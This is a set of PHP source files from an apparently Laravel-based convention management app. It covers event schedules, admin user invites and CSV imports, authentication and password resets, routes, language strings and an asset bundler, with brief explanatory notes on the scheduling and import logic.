}
$cell = "";
if ($activity->category)
{
// $cell .= "<span class=\"glyphicon glyphicon-tag\" title=\"{$activity->category->name}\"></span> ";
}
if ($user && $activity->participants()->where('user_id', '=', $user->id)->count())
{
$name = sprintf('<span class="glyphicon glyphicon-asterisk" title="%s"></span> %s', Lang::get('messages.signed_up'), $activity->name);
}
else {
$name = $activity->name;
}
$cell .= sprintf('<a href="%s">%s</a>', action('ActivitiesController@getShow', $activity->id), $name);
$cell .= sprintf('<div class="duration">%s</div>', $activity->getDuration());
$row[] = sprintf('<td rowspan="%d" class="active %s" style="background-color:%s;">%s</td>',
$rowspan,
$activity->category->textColor(),
$activity->category->color,
$cell
);
}
else
{
if ($rowspans[$room->id] > 1)
{
$rowspans[$room->id] -= 1;
}
else
{
$row[] = sprintf('<td rowspan="%d"> </td>', $rowspan);
}
}
}
}
$table[] = $row;
$currentTime->addHour();
}
$days[] = array(
'date' => $date,
'activities' => $activities,
'firstTime' => $firstTime,
'lastTime' => $lastTime,
'table' => $table,
'categories' =>$categories
);
}
$page_title = $event->name;
return View::make('events.schedule', compact('event', 'rooms', 'days', 'roomRows', 'page_title'));
}
catch(Exception $e)
{
return Redirect::back()
->with('error', $e->getMessage());
}
}
}
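The schedule grid in getSchedule() above hinges on per-room rowspan counters: when an activity spans several hourly rows, the following rows must emit no cell for that room until the rowspan is used up. A stripped-down sketch of that bookkeeping for a single room column, with activities represented simply as a hypothetical startHour => durationInHours map (overlapping activities are not handled, as in the original):

```php
<?php
// Stripped-down sketch of the rowspan bookkeeping in getSchedule():
// one column (room), hourly rows. When an activity starts, its cell is
// emitted with rowspan = duration in hours; the counter then suppresses
// cell output for the rows that rowspan already covers.
function buildRoomColumn(array $activities, $firstHour, $lastHour)
{
    $cells = array();
    $pending = 1; // rows still covered by the previous cell's rowspan
    for ($hour = $firstHour; $hour <= $lastHour; $hour++) {
        if (isset($activities[$hour])) {
            $pending = $activities[$hour];
            $cells[] = sprintf('<td rowspan="%d">%02d:00</td>', $pending, $hour);
        } elseif ($pending > 1) {
            $pending -= 1; // covered from above: emit nothing this row
        } else {
            $cells[] = '<td>&nbsp;</td>'; // free slot
        }
    }
    return $cells;
}
```

A two-hour activity at 10:00 and a one-hour activity at 13:00 over the 10:00–14:00 range produce four cells: the 11:00 row is swallowed by the first cell's rowspan.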
<file_sep><?php
class AdminUsersController extends AdminBaseController {
public $restful = true;
/**
* User Repository
*
* @var User
*/
protected $user;
public function __construct(User $user)
{
$this->title ='';
$this->user = $user;
$this->user->setHasher(new Cartalyst\Sentry\Hashing\NativeHasher);
// Set up checker
$this->checkColumn = 'email';
$this->checkModel = 'User';
$this->checkMessage = 'messages.check_user';
}
/**
* Invites all users
*
* @return Response
*/
public function inviteAll()
{
foreach (User::all() as $user) {
if (!$user->invited)
{
try
{
$email = $user->email;
$name = $user->name;
$password = <PASSWORD>(8);
$resetCode = $user->getResetPasswordCode();
if ($user->checkResetPasswordCode($resetCode))
{
if ($user->attemptResetPassword($resetCode, $password))
{
Mail::queue('emails.auth.invite', compact('email', 'name', 'password'), function($message) use ($email, $name)
{
$message->to($email, $name)->subject(Lang::get('emails.subject.invite', array('app' => Lang::get('app.name'))));
});
$user->invited = true;
$user->save();
}
}
}
catch (Cartalyst\Sentry\Users\UserNotFoundException $e)
{}
}
}
return Redirect::action('AdminUsersController@index')
->with('success', Lang::get('messages.invite_success'));
}
/**
* Sends invitation email to the specified user.
*
* @return Response
*/
public function invite($id)
{
try
{
$user = Sentry::findUserById($id);
$email = $user->email;
$name = $user->name;
$password = <PASSWORD>(8);
$resetCode = $user->getResetPasswordCode();
if ($user->checkResetPasswordCode($resetCode))
{
if ($user->attemptResetPassword($resetCode, $password))
{
Mail::send('emails.auth.invite', compact('email', 'name', 'password'), function($message) use ($email, $name)
{
$message->to($email, $name)->subject(Lang::get('emails.subject.invite', array('app' => Lang::get('app.name'))));
});
$user->invited = true;
$user->save();
return Redirect::action('AdminUsersController@show', $id)
->with('success', Lang::get('messages.invite_success'));
}
else
{
return Redirect::action('AdminUsersController@show', $id)
->with('error', Lang::get('messages.invite_error'));
}
}
else
{
return Redirect::action('AdminUsersController@show', $id)
->with('error', Lang::get('messages.invite_error'));
}
}
catch (Cartalyst\Sentry\Users\UserNotFoundException $e)
{
return Redirect::action('AdminUsersController@index')
->with('error', Lang::get('messages.user_not_found'));
}
}
/**
* Displays the data import form.
*
* @return Response
*/
public function getImportData()
{
return View::make('admin.users.import_data');
}
/**
* Handles the user import form.
*
* @return Response
*/
public function postImportData()
{
if (Input::hasFile('file'))
{
$event = ConEvent::find(2);
$file = file(Input::file('file')->getRealPath());
foreach($file as $line)
{
// $csv = str_getcsv($line, ';');
$data = explode(';', $line);
$name = trim($data[0]);
$email = trim($data[1]);
$country = trim($data[2]);
$food = trim($data[3]);
$allergy = trim($data[4]);
$room = trim($data[5]);
$with = trim($data[6]);
$awig = trim($data[7]);
try
{
$user = User::where('email', 'like', $email)->firstOrFail();
try
{
$country = Country::where('name', 'like', $country)->firstOrFail();
}
catch (Exception $e)
{
$country = null;
}
if ($country)
{
$user->country_id = $country->id;
}
$user->save();
// echo "{$user->id} {$country->id} $food $awig\n";
if ($awig === 'Yes')
{
$user->events()->sync(array('1','2'));
}
// Food
$pdata = array(
'user_id' => $user->id,
'profile_field_id' => '1',
'value' => $food,
'visibility' => 'private'
);
if (!sizeof($user->profileData))
{
$profileData = ProfileData::create($pdata);
}
else {
try {
$field = $user->profileData()->where('profile_field_id','=', $pdata['profile_field_id'])->firstOrFail();
$field->update($pdata);
}
catch(Illuminate\Database\Eloquent\ModelNotFoundException $e)
{
$profileData = ProfileData::create($pdata);
}
}
// Allergy
try
{
$pdata = array(
'user_id' => $user->id,
'profile_field_id' => '2',
'value' => $allergy,
'visibility' => 'private'
);
if (!sizeof($user->profileData))
{
$profileData = ProfileData::create($pdata);
}
else {
try {
$field = $user->profileData()->where('profile_field_id','=', $pdata['profile_field_id'])->firstOrFail();
$field->update($pdata);
}
catch(Illuminate\Database\Eloquent\ModelNotFoundException $e)
{
$profileData = ProfileData::create($pdata);
}
}
}
catch (Exception $e)
{
}
// room
$pdata = array(
'user_id' => $user->id,
'profile_field_id' => '6',
'value' => $room,
'visibility' => 'private'
);
if (!sizeof($user->profileData))
{
$profileData = ProfileData::create($pdata);
}
else {
try {
$field = $user->profileData()->where('profile_field_id','=', $pdata['profile_field_id'])->firstOrFail();
$field->update($pdata);
}
catch(Illuminate\Database\Eloquent\ModelNotFoundException $e)
{
$profileData = ProfileData::create($pdata);
}
}
// with
$pdata = array(
'user_id' => $user->id,
'profile_field_id' => '5',
'value' => $with,
'visibility' => 'private'
);
if (!sizeof($user->profileData))
{
$profileData = ProfileData::create($pdata);
}
else {
try {
$field = $user->profileData()->where('profile_field_id','=', $pdata['profile_field_id'])->firstOrFail();
$field->update($pdata);
}
catch(Illuminate\Database\Eloquent\ModelNotFoundException $e)
{
$profileData = ProfileData::create($pdata);
}
}
}
catch (Exception $e)
{
}
}
}
return Redirect::action('AdminUsersController@index')
->with('success', Lang::get('messages.import_data_success'));
}
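postImportData() above repeats the same create-or-update dance four times (food, allergy, room, with). A standalone sketch of that upsert over a plain array of rows — the real code goes through the ProfileData Eloquent model, but the control flow is the same:

```php
<?php
// Sketch of the repeated "update existing profile value or create it"
// logic in postImportData(), over a plain array of rows instead of the
// ProfileData model.
function setProfileValue(array $rows, array $pdata)
{
    foreach ($rows as $i => $row) {
        if ($row['profile_field_id'] === $pdata['profile_field_id']) {
            $rows[$i] = array_merge($row, $pdata); // update existing row
            return $rows;
        }
    }
    $rows[] = $pdata; // nothing to update: create
    return $rows;
}
```

Factoring the four blocks through a helper like this would also remove the sizeof($user->profileData) special case, which re-checks a condition the firstOrFail() / ModelNotFoundException branch already covers.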
/**
* Displays the user export form.
*
* @return Response
*/
public function getExport()
{
return View::make('admin.users.export');
}
/**
* Displays the user import form.
*
* @return Response
*/
public function getImport()
{
return View::make('admin.users.import');
}
/**
* Handles the user import form.
*
* @return Response
*/
public function postImport()
{
$user = $this->user;
if (Input::hasFile('file'))
{
$file = file(Input::file('file')->getRealPath());
foreach($file as $line)
{
if (strlen($line) && strpos($line, "\t") !== false)
{
$data = explode("\t", $line);
$input = array('email' => trim($data[1]), 'password' => md5(rand()), 'name' => trim($data[0]));
if (!(boolean) User::where('email', '=', $input['email'])->count())
{
$user = \Sentry::getUserProvider()->create($input);
$activationCode = $user->getActivationCode();
$user->attemptActivation($activationCode);
if (Input::has('events'))
{
$user->events()->sync(Input::get('events'));
}
}
}
}
return Redirect::action('AdminUsersController@index');
}
return Redirect::action('AdminUsersController@getImport')
->withInput()
->with('message', Lang::get('messages.validation_error'));
}
/**
* Displays the user export form.
*
* @return Response
*/
public function getContact()
{
$users = User::all();
return View::make('admin.users.contact', compact('users'));
}
/**
* Display a listing of the resource.
*
* @return Response
*/
public function index()
{
$page = Input::has('page') ? Input::get('page') : '1';
$sort = Input::has('sort') ? Input::get('sort') : 'name';
$order = Input::has('order') ? Input::get('order') : 'asc';
$users = User::orderBy($sort, $order)->paginate(20);
return View::make('admin.users.index', compact('users', 'sort', 'order', 'page'));
}
/**
* Display a listing of the resource.
*
* @return Response
*/
public function postSearch()
{
try
{
$term = Input::has('term') ? Input::get('term') : '';
$users = User::where('name', 'like', "%$term%")->get();
return View::make('admin.users.search_result', compact('users'));
}
catch (Exception $e)
{
return Redirect::back()->with('error', $e->getMessage());
}
}
/**
* Show the form for creating a new resource.
*
* @return Response
*/
public function create()
{
$countries = Country::formList();
$events = ConEvent::orderBy('starts_at', 'asc')->get();
return View::make('admin.users.create', compact('countries', 'events'));
}
/**
* Store a newly created resource in storage.
*
* @return Response
*/
public function store()
{
// $input = Input::all();
$input = array_except(Input::all(), array('_method', '_token', 'events', 'groups'));
$validation = Validator::make($input, User::$rules);
if ($validation->passes())
{
try
{
// Create the user
$user = Sentry::createUser(array(
'email' => trim($input['email']),
'password' => $input['<PASSWORD>'],
'activated' => true,
));
// $user = User::find($user->id);
$user->name = trim($input['name']);
$user->country_id = $input['country_id'];
$user->save();
if (Input::has('events'))
{
$user->events()->sync(Input::get('events'));
}
try
{
foreach (Cartalyst\Sentry\Groups\Eloquent\Group::all() as $group)
{
if (Input::has('groups') && in_array($group->getId(), Input::get('groups')))
{
$user->addGroup($group);
}
else
{
$user->removeGroup($group);
}
}
}
catch (Exception $e)
{
$return = Redirect::back()
->with('error', Lang::get('messages.not_found', array('model' => Lang::get('labels.group'))));
}
}
catch (Cartalyst\Sentry\Users\LoginRequiredException $e)
{
return Redirect::action('AdminUsersController@create')
->withInput()
->withErrors($validation)
->with('error', Lang::get('Login field is required.'));
}
catch (Cartalyst\Sentry\Users\PasswordRequiredException $e)
{
return Redirect::action('AdminUsersController@create')
->withInput()
->withErrors($validation)
->with('error', Lang::get('Password field is required.'));
}
catch (Cartalyst\Sentry\Users\UserExistsException $e)
{
return Redirect::action('AdminUsersController@create')
->withInput()
->withErrors($validation)
->with('error', Lang::get('User with this login already exists.'));
}
return Redirect::action('AdminUsersController@show', $user->id)
->with('success', Lang::get('messages.create_success', array('model' => Lang::get('labels.user'))));
}
return Redirect::action('AdminUsersController@create')
->withInput()
->withErrors($validation)
->with('error', Lang::get('messages.validation_error'));
}
/**
* Display the specified resource.
*
* @param int $id
* @return Response
*/
public function show($id)
{
$user = $this->user->findOrFail($id);
$fields = array();
$values = array();
if (ProfileField::all()->count() && $user->profileData->count())
{
$fields = ProfileField::whereHas('events', function($q) use (&$user)
{
$q->whereIn('con_event_id', $user->events()->lists('con_event_id'));
})->orderBy('sort_order')->get();
$allFields = ProfileField::all();
$fields = $allFields;
$values = array();
foreach($allFields as $field)
{
$field_data = $user->profileData()->where('profile_field_id','=', $field->id)->first();
if ($field_data)
{
$values[$field->id] = array(
'value' => $field_data->value,
'visibility' => $field_data->visibility
);
}
}
}
return View::make('admin.users.show', compact('user', 'fields', 'values'));
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return Response
*/
public function edit($id)
{
$user = $this->user->find($id);
if (is_null($user))
{
return Redirect::action('AdminUsersController@index')
->with('error', Lang::get('messages.user_not_found'));
}
return View::make('admin.users.edit', compact('user'));
}
/**
* Update the specified resource in storage.
*
* @param int $id
* @return Response
*/
public function update($id)
{
$input = array_except(Input::all(), array('_method', '_token', 'events', 'groups'));
$validation = Validator::make($input, User::$rules);
if ($validation->passes())
{
$user = $this->user->find($id);
$input['email'] = trim($input['email']);
$user->update($input);
if (Input::has('events'))
{
$user->events()->sync(Input::get('events'));
}
try
{
foreach (Cartalyst\Sentry\Groups\Eloquent\Group::all() as $group)
{
if (Input::has('groups') && in_array($group->getId(), Input::get('groups')))
{
$user->addGroup($group);
}
else
{
$user->removeGroup($group);
}
}
}
catch (Exception $e)
{
$return = Redirect::back()
->with('error', Lang::get('messages.not_found', array('model' => Lang::get('labels.group'))));
}
return Redirect::action('AdminUsersController@show', $user->id)
->with('success', Lang::get('messages.update_success', array('model' => Lang::get('labels.user'))));
}
return Redirect::action('AdminUsersController@edit', $id)
->withInput()
->withErrors($validation)
->with('message', Lang::get('messages.validation_error'));
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return Response
*/
public function destroy($id)
{
$this->user->find($id)->delete();
if (Request::ajax())
{
return json_encode(true);
}
else
{
return Redirect::action('AdminUsersController@index')
->with('success', Lang::get('messages.destroy_success', array('model' => ucfirst(Lang::get('labels.user')))));
}
}
}
<file_sep><?php
class ConEventCategory extends BaseModel {
protected $guarded = array();
public static $rules = array(
'name' => 'required',
'name_translation' => 'required',
'color' => 'required',
'text_color' => 'required'
);
public function events()
{
return $this->hasMany('ConEvent');
}
}
<file_sep><?php
return array(
"toggle_navigation" => "Toggle Navigation",
'empty_list' => 'No :model.',
"select_country" => "Select Country",
'wrong_password' => '<PASSWORD>!',
'users_can_change_visibility' => 'Users are allowed to change field visibility',
'check_profileField' => "There's already a profile field with this name!",
'check_user' => 'This user already exists!',
'check_event' => "There's already an event with this name!",
'check_venue' => "There's already a venue with this name!",
'validation_errors' => 'There were validation errors!',
'create_success' => ':model successfully created!',
'update_success' => ':model successfully updated!',
'update_error' => ':model could not be updated!',
'not_found' => ':model not found!',
'destroy_success' => ':model successfully deleted!',
'not_selected' => 'No :model selected',
'password_reset_success' => 'Password successfully reset! A new password has been sent to your email.',
'password_change_success' => 'Password successfully changed!',
'password_change_error' => 'Password change failed, please try again!',
'public_data' => 'Display the above information to other users',
'private_data' => 'Only for me and organizers',
'public_info' => 'The following fields are private to you and the organizers unless otherwise stated.',
'validation_error' => 'There were validation errors!',
'confirm_delete' => 'Are you sure you want to delete this resource?',
'invalid_reset_code' => 'Invalid reset code!',
'password_reset_error' => 'Password reset failed, please try again.',
'password_reminder_sent' => 'Password reminder sent!',
'user_not_found' => 'User not found!',
'login_success' => 'Successfully logged in!',
'logout_success' => 'Successfully logged out!',
'invite_success' => 'Invite sent successfully!',
'invite_error' => 'Something went wrong while sending the invite.',
'no_current_events' => 'no events happening now',
'no_future_events' => 'No future events',
'no_past_events' => 'No past events',
'enter_profile' => 'Please update your profile to make sure we have all the relevant information we need to make your experience as awesome as possible! Click your name in the top right corner to edit your profile.',
'event_subtitle' => 'From :start to :end at :venue',
'activity_subtitle' => ':start to :end at :room',
'never_logged_in' => 'have never logged in',
'all_rooms' => 'Activity takes place in all rooms of the venue',
'hosted_by' => 'Hosted by :hosts',
'co_hosted_by' => 'Co-hosted by :cohosts',
"error_activity_not_open" => "This activity is not open for sign-up!",
"error_activity_full" => "This activity is filled to capacity!",
"success_activity_joined" => "You are now signed up for :activity.",
"success_activity_left" => "You are no longer attending :activity.",
'participants' => 'There are :participants participants from :countries countries.',
'signup_limit_help' => 'The fraction of places (rounded down) being open for sign-up. 0.5 equals 50%, 1.0 equals 100%, etc.',
'signed_up' => 'You have signed up for this activity.',
);
<file_sep><?php
use Illuminate\Database\Migrations\Migration;
use Illuminate\Database\Schema\Blueprint;
class CreateProfileFieldsTable extends Migration {
/**
* Run the migrations.
*
* @return void
*/
public function up()
{
Schema::create('profile_fields', function(Blueprint $table) {
$table->increments('id');
$table->string('name');
$table->enum('type', array('string', 'text', 'option', 'checkbox', 'select', 'multi', 'relation'));
$table->text('options')->nullable();
$table->string('default')->nullable();
$table->string('relation_table')->nullable();
$table->enum('visibility', array('private', 'public'))->default('public');
$table->boolean('visibility_control')->default(false);
$table->timestamps();
});
}
/**
* Reverse the migrations.
*
* @return void
*/
public function down()
{
Schema::drop('profile_fields');
}
}
<file_sep><?php
return array(
/**
* Error messages
*/
"error_not_found" => "Venue not found!",
/**
* Success messages
*/
);
<file_sep><?php
class AdminActivitiesController extends BaseController {
/**
* Activity Repository
*
* @var Activity
*/
protected $Activity;
public function __construct(Activity $Activity)
{
$this->Activity = $Activity;
$this->events = array();
foreach(ConEvent::all() as $event) {
$this->events[$event->id] = $event->name;
}
$this->users = array();
foreach(User::all() as $user) {
$this->users[$user->id] = $user->name ? $user->name : $user->email;
}
}
/**
* Display a listing of the resource.
*
* @return Response
*/
public function index()
{
$activities = Activity::all();
return View::make('admin.activities.index', compact('activities'));
}
/**
* Show the form for creating a new resource.
*
* @return Response
*/
public function create()
{
$events = $this->events;
$users = $this->users;
return View::make('admin.activities.create', compact('events', 'users'));
}
/**
* Store a newly created resource in storage.
*
* @return Response
*/
public function store()
{
$input = array_except(Input::all(), array('_method', '_token'));
$validation = Validator::make($input, Activity::$rules);
if ($validation->passes())
{
$activity = Activity::create($input);
// if (Input::has('hosts'))
// {
// $hosts = array();
// foreach (Input::get('hosts') as $host) {
// $hosts[$host] = array('host' => true);
// }
// // $activity->hosts()->sync($hosts);
// }
// if (Input::has('participants'))
// {
// // $activity->hosts()->sync(Input::get('participants'));
// }
return Redirect::action('AdminActivitiesController@index')
->with('success', Lang::get('messages.create_success', array('model' => ucfirst(Lang::get('labels.activity')))));
}
return Redirect::action('AdminActivitiesController@create')
->withInput()
->withErrors($validation)
->with('error', Lang::get('messages.validation_error'));
}
/**
* Display the specified resource.
*
* @param int $id
* @return Response
*/
public function show($id)
{
$activity = Activity::findOrFail($id);
return View::make('admin.activities.show', compact('activity'));
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return Response
*/
public function edit($id)
{
$activity = Activity::find($id);
if ($activity && $activity->venue) {
$rooms = Room::where('venue_id', '=', $activity->venue->id)->get();
}
else {
$rooms = null;
}
if (is_null($activity))
{
return Redirect::action('AdminActivitiesController@index');
}
$users = $this->users;
$events = $this->events;
return View::make('admin.activities.edit', compact('activity', 'events', 'users', 'rooms'));
}
/**
* Update the specified resource in storage.
*
* @param int $id
* @return Response
*/
public function update($id)
{
$input = array_except(Input::all(), array('_method', '_token'));
$validation = Validator::make($input, Activity::$rules);
if ($validation->passes())
{
$activity = Activity::find($id);
$activity->update($input);
if (!Input::has('open'))
{
$activity->open = false;
$activity->save();
}
// if (Input::has('hosts'))
// {
// $hosts = array();
// foreach (Input::get('hosts') as $host) {
// $hosts[$host] = array('host' => true);
// }
// $user->activity->hosts()->sync($hosts);
// }
// if (Input::has('participants'))
// {
// $user->activity->hosts()->sync(Input::get('participants'));
// }
return Redirect::action('AdminActivitiesController@show', $id)
->with('success', Lang::get('messages.update_success', array('model' => ucfirst(Lang::get('labels.activity')))));
}
return Redirect::action('AdminActivitiesController@edit', $id)
->withInput()
->withErrors($validation)
->with('message', Lang::get('messages.validation_error'));
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return Response
*/
public function destroy($id)
{
Activity::find($id)->delete();
return Redirect::action('AdminActivitiesController@index');
}
}
<file_sep><?php
/*
|--------------------------------------------------------------------------
| Application Routes
|--------------------------------------------------------------------------
|
| Here is where you can register all of the routes for an application.
| It's a breeze. Simply tell Laravel the URIs it should respond to
| and give it the Closure to execute when that URI is requested.
|
*/
// Assets
Route::get('/js/admin.js', 'AssetsController@jsAdmin');
Route::get('/js/bacon.js', 'AssetsController@jsPublic');
Route::get('/js/external.js', 'AssetsController@jsExternal');
Route::get('/css/admin.css', 'AssetsController@cssAdmin');
Route::get('/css/bacon.css', 'AssetsController@cssPublic');
Route::get('/css/external.css', 'AssetsController@cssExternal');
// Public
Route::controller('event', 'ConEventsController');
Route::controller('activity', 'ActivitiesController');
Route::controller('venue', 'VenuesController');
Route::controller('room', 'RoomsController');
Route::group(array('before' => 'auth'), function()
{
Route::controller('user', 'UsersController');
Route::controller('country', 'CountriesController');
});
// Admin
Route::group(array('before' => 'auth|admin'), function()
{
// Mail debug
Route::controller('mail', 'MailController');
Route::post('admin/users/search', 'AdminUsersController@postSearch');
Route::get('admin/users/contact', 'AdminUsersController@getContact');
Route::get('admin/users/import-data', 'AdminUsersController@getImportData');
Route::post('admin/users/import-data', 'AdminUsersController@postImportData');
Route::get('admin/users/import', 'AdminUsersController@getImport');
Route::post('admin/users/import', 'AdminUsersController@postImport');
Route::get('admin/users/export', 'AdminUsersController@getExport');
Route::post('admin/users/export', 'AdminUsersController@postExport');
Route::get('admin/users/invite/{id}', 'AdminUsersController@invite');
Route::get('admin/users/invite/', 'AdminUsersController@inviteAll');
Route::any('admin/users/check', 'AdminUsersController@check');
Route::resource('admin/users', 'AdminUsersController');
Route::any('admin/events/check', 'AdminConEventsController@check');
Route::get('admin/events/toggle_open/{event}/{action}', 'AdminConEventsController@getToggleOpen');
Route::resource('admin/events', 'AdminConEventsController');
Route::any('admin/venues/check', 'AdminVenuesController@check');
Route::resource('admin/venues', 'AdminVenuesController');
Route::any('admin/fields/check', 'AdminProfileFieldsController@check');
Route::resource('admin/fields', 'AdminProfileFieldsController');
// Route::any('admin/activities/check', 'AdminActivitiesController@check');
Route::resource('admin/activities', 'AdminActivitiesController');
// Route::any('admin/activity_categories/check', 'AdminActivityCategoriesController@check');
Route::resource('admin/activity_categories', 'AdminActivityCategoriesController');
// Route::any('admin/rooms/check', 'AdminRoomsController@check');
Route::resource('admin/rooms', 'AdminRoomsController');
// Route::any('admin/AdminFeaturesController/check', 'AdminFeaturesController@check');
// Route::resource('admin/features', 'AdminFeaturesController');
Route::controller('admin', 'AdminController');
});
// Auth
Route::controller('auth', 'AuthController');
// Index
Route::get('/', array('as' => 'home', 'uses' => 'HomeController@index'));
<file_sep><?php
class AuthController extends BaseController {
/**
* User Repository
*
* @var User
*/
protected $user;
public function __construct()
{
$this->title = '';
$this->messageBag = new Illuminate\Support\MessageBag;
// $this->user = $user;
// $this->user->setHasher(new Cartalyst\Sentry\Hashing\NativeHasher);
}
public function getLogin()
{
return View::make('auth.login');
}
public function postLogin()
{
try
{
// Set login credentials
$credentials = array(
'email' => Input::get('email'),
'password' => Input::get('password'),
);
// Try to authenticate the user
$user = Sentry::authenticate($credentials, (boolean) Input::get('remember'));
}
catch (Cartalyst\Sentry\Users\LoginRequiredException $e)
{
return $this->loginFail('Login field is required.');
}
catch (Cartalyst\Sentry\Users\PasswordRequiredException $e)
{
return $this->loginFail('Password field is required.');
}
catch (Cartalyst\Sentry\Users\WrongPasswordException $e)
{
return $this->loginFail('Wrong password, try again.');
}
catch (Cartalyst\Sentry\Users\UserNotFoundException $e)
{
return $this->loginFail('User was not found.');
}
catch (Cartalyst\Sentry\Users\UserNotActivatedException $e)
{
return $this->loginFail('User is not activated.');
}
// The following is only required if throttle is enabled
catch (Cartalyst\Sentry\Throttling\UserSuspendedException $e)
{
return $this->loginFail('User is suspended.');
}
catch (Cartalyst\Sentry\Throttling\UserBannedException $e)
{
return $this->loginFail('User is banned.');
}
return Redirect::action('HomeController@index')
->with('success', Lang::get('messages.login_success'));
}
protected function loginFail($message)
{
return Redirect::action('AuthController@getLogin')
->withInput(Input::except('password'))
->with('error', $message);
}
public function getLogout() {
Sentry::logout();
return Redirect::action('HomeController@index')
->with('success', Lang::get('messages.logout_success'));
}
public function getReminder()
{
return View::make('auth.reminder');
}
public function postReminder()
{
try
{
$user = Sentry::findUserByLogin(Input::get('email'));
$email = $user->email;
$code = $user->getResetPasswordCode();
$name = $user->name;
// return View::make('emails.auth.reminder', $data);
Mail::send('emails.auth.reminder', compact('email', 'name', 'code'), function($message) use ($email, $name)
{
$message->to($email, $name)->subject(Lang::get('emails.subject.reminder', array('app' => Lang::get('app.name'))));
});
}
catch (Cartalyst\Sentry\Users\UserNotFoundException $e)
{
return Redirect::action('AuthController@getReminder')
->withInput()
->with('error', Lang::get('messages.user_not_found'));
}
return Redirect::to('/')
->with('success', Lang::get('messages.password_reminder_sent'));
}
public function getReset($email, $code)
{
try
{
// Find the user using the user id
$user = Sentry::findUserByLogin($email);
$password = <PASSWORD>(8);
$name = $user->name;
// Check if the reset password code is valid
if ($user->checkResetPasswordCode($code))
{
// Attempt to reset the user password
if ($user->attemptResetPassword($code, $password))
{
// Password reset passed
Mail::send('emails.auth.reset', compact('name', 'password'), function($message) use ($email, $name, $password)
{
$message->to($email, $name)->subject(Lang::get('emails.subject.reset', array('app' => Lang::get('app.name'))));
});
return Redirect::action('AuthController@getLogin')
->with('success', Lang::get('messages.password_reset_success'));
}
else
{
return Redirect::action('AuthController@getReminder')
->with('error', Lang::get('messages.password_reset_error'));
}
}
else
{
// The provided password reset code is Invalid
return Redirect::action('AuthController@getReminder')
->with('error', Lang::get('messages.invalid_reset_code'));
}
}
catch (Cartalyst\Sentry\Users\UserNotFoundException $e)
{
return Redirect::action('AuthController@getReminder')
->with('error', Lang::get('messages.user_not_found'));
}
}
public function postReset()
{
try
{
return $this->getReset(Input::get('email'), Input::get('code'));
}
catch (Exception $e)
{
return Redirect::action('AuthController@getReminder')
->with('error', Lang::get('messages.user_not_found'));
}
}
}
<file_sep><?php
return array(
/**
* Error messages
*/
"error_not_found" => "Event not found!",
"error_not_open" => "Event is not open for sign-up!",
/**
* Success messages
*/
"success_joined" => "You are now attending :event.",
"success_left" => "You are no longer attending :event.",
"success_open" => 'Opened all activities for event.',
"success_close" => 'Closed all activities for event.',
);
<file_sep><?php
class RoomsController extends BaseController
{
/**
* Display the specified resource or listing.
*
* @param int $id
* @return Response
*/
public function getIndex($id = null)
{
$rooms = Room::all();
return View::make('rooms.index', compact('rooms'));
}
public function getShow($id)
{
try {
$room = Room::findOrFail($id);
}
catch (Exception $e) {
return Redirect::action('HomeController@index')->with('error', 'Room not found!');
}
return View::make('rooms.show', compact('room'));
}
}
<file_sep><?php
class CountriesController extends BaseController
{
/**
* Display the specified resource or listing.
*
* @param int $id
* @return Response
*/
public function getIndex($id = null)
{
$page = Input::has('page') ? Input::get('page') : '1';
$sort = Input::has('sort') ? Input::get('sort') : 'name';
$order = Input::has('order') ? Input::get('order') : 'asc';
if ($sort === 'users') {
// Sort countries by their number of users; previously $countries was
// left undefined on this code path.
$countries = Country::with('users')->get()->sortBy(function($country)
{
return $country->users->count();
});
if ($order === 'desc') {
$countries = $countries->reverse();
}
}
else {
$countries = Country::orderBy($sort, $order)->get();
}
return View::make('countries.index', compact('countries', 'sort', 'order', 'page'));
}
public function getShow($id)
{
try {
$country = Country::findOrFail($id);
}
catch (Exception $e) {
return Redirect::action('HomeController@index')->with('error', 'Country not found!');
}
return View::make('countries.show', compact('country'));
}
}
<file_sep><?php
class AssetsController extends BaseController
{
private $vendorCss = array(
'/css/vendor/bootstrap-3.1.0.min.css',
'/css/vendor/bootstrap-theme-3.1.0.min.css',
'/css/vendor/jquery-ui-1.10.4.css',
'/css/vendor/jquery-ui-timepicker-addon-1.4.3.min.css',
);
private $publicCss = array(
'/css/bacon/public.css'
);
private $adminCss = array(
'/css/bacon/admin.css'
);
private $externalCss = array(
'/css/vendor/bootstrap-3.1.0.min.css',
'/css/vendor/bootstrap-theme-3.1.0.min.css',
'/css/bacon/external.css'
);
private $vendorJs = array(
'/js/vendor/jquery-2.1.0.min.js',
'/js/vendor/jquery-ui-1.10.4.min.js',
'/js/vendor/moment-with-langs-2.5.1.min.js',
'/js/vendor/bootstrap-3.1.0.min.js',
'/js/vendor/jquery.validate-1.11.1.min.js',
// '/js/vendor/additional-methods-1.11.1.min.js',
'/js/vendor/jquery-ui-timepicker-addon-1.4.3.min.js',
// '/js/vendor/bootstrap3-typeahead.js',
);
private $publicJs = array(
'/js/bacon/forms.js',
'/js/bacon/public.js'
);
private $adminJs = array(
'/js/bacon/forms.js',
'/js/bacon/admin.js'
);
private $externalJs = array(
// jQuery and jQuery UI must load before Bootstrap's JS, which depends on jQuery.
'/js/vendor/jquery-2.1.0.min.js',
'/js/vendor/jquery-ui-1.10.4.min.js',
// '/js/vendor/jquery.validate-1.11.1.min.js',
'/js/vendor/bootstrap-3.1.0.min.js'
);
private function import($files)
{
$path = public_path();
$contents = '';
foreach($files as $file)
{
$file = $path . $file;
if (file_exists($file)) {
$contents .= file_get_contents($file);
}
}
return $contents;
}
private function makeJs($files)
{
$contents = View::make('js.options') . $this->import($files);
$response = Response::make($contents);
$response->header('Content-Type', 'application/javascript');
return $response;
}
private function makeCss($files)
{
$response = Response::make($this->import($files));
$response->header('Content-Type', 'text/css');
return $response;
}
public function jsAdmin()
{
return $this->makeJs(array_merge($this->vendorJs, $this->adminJs));
}
public function jsPublic()
{
return $this->makeJs(array_merge($this->vendorJs, $this->publicJs));
}
public function jsExternal()
{
return $this->makeJs($this->externalJs);
}
public function cssAdmin()
{
return $this->makeCss(array_merge($this->vendorCss, $this->adminCss));
}
public function cssPublic()
{
return $this->makeCss(array_merge($this->vendorCss, $this->publicCss));
}
public function cssExternal()
{
return $this->makeCss($this->externalCss);
}
}
<file_sep><?php
class Venue extends BaseModel {
protected $guarded = array();
public static $rules = array(
'name' => 'required',
'location' => 'required',
'description' => 'required'
);
public function rooms()
{
return $this->hasMany('Room');
}
public function events()
{
return $this->hasMany('ConEvent');
}
}
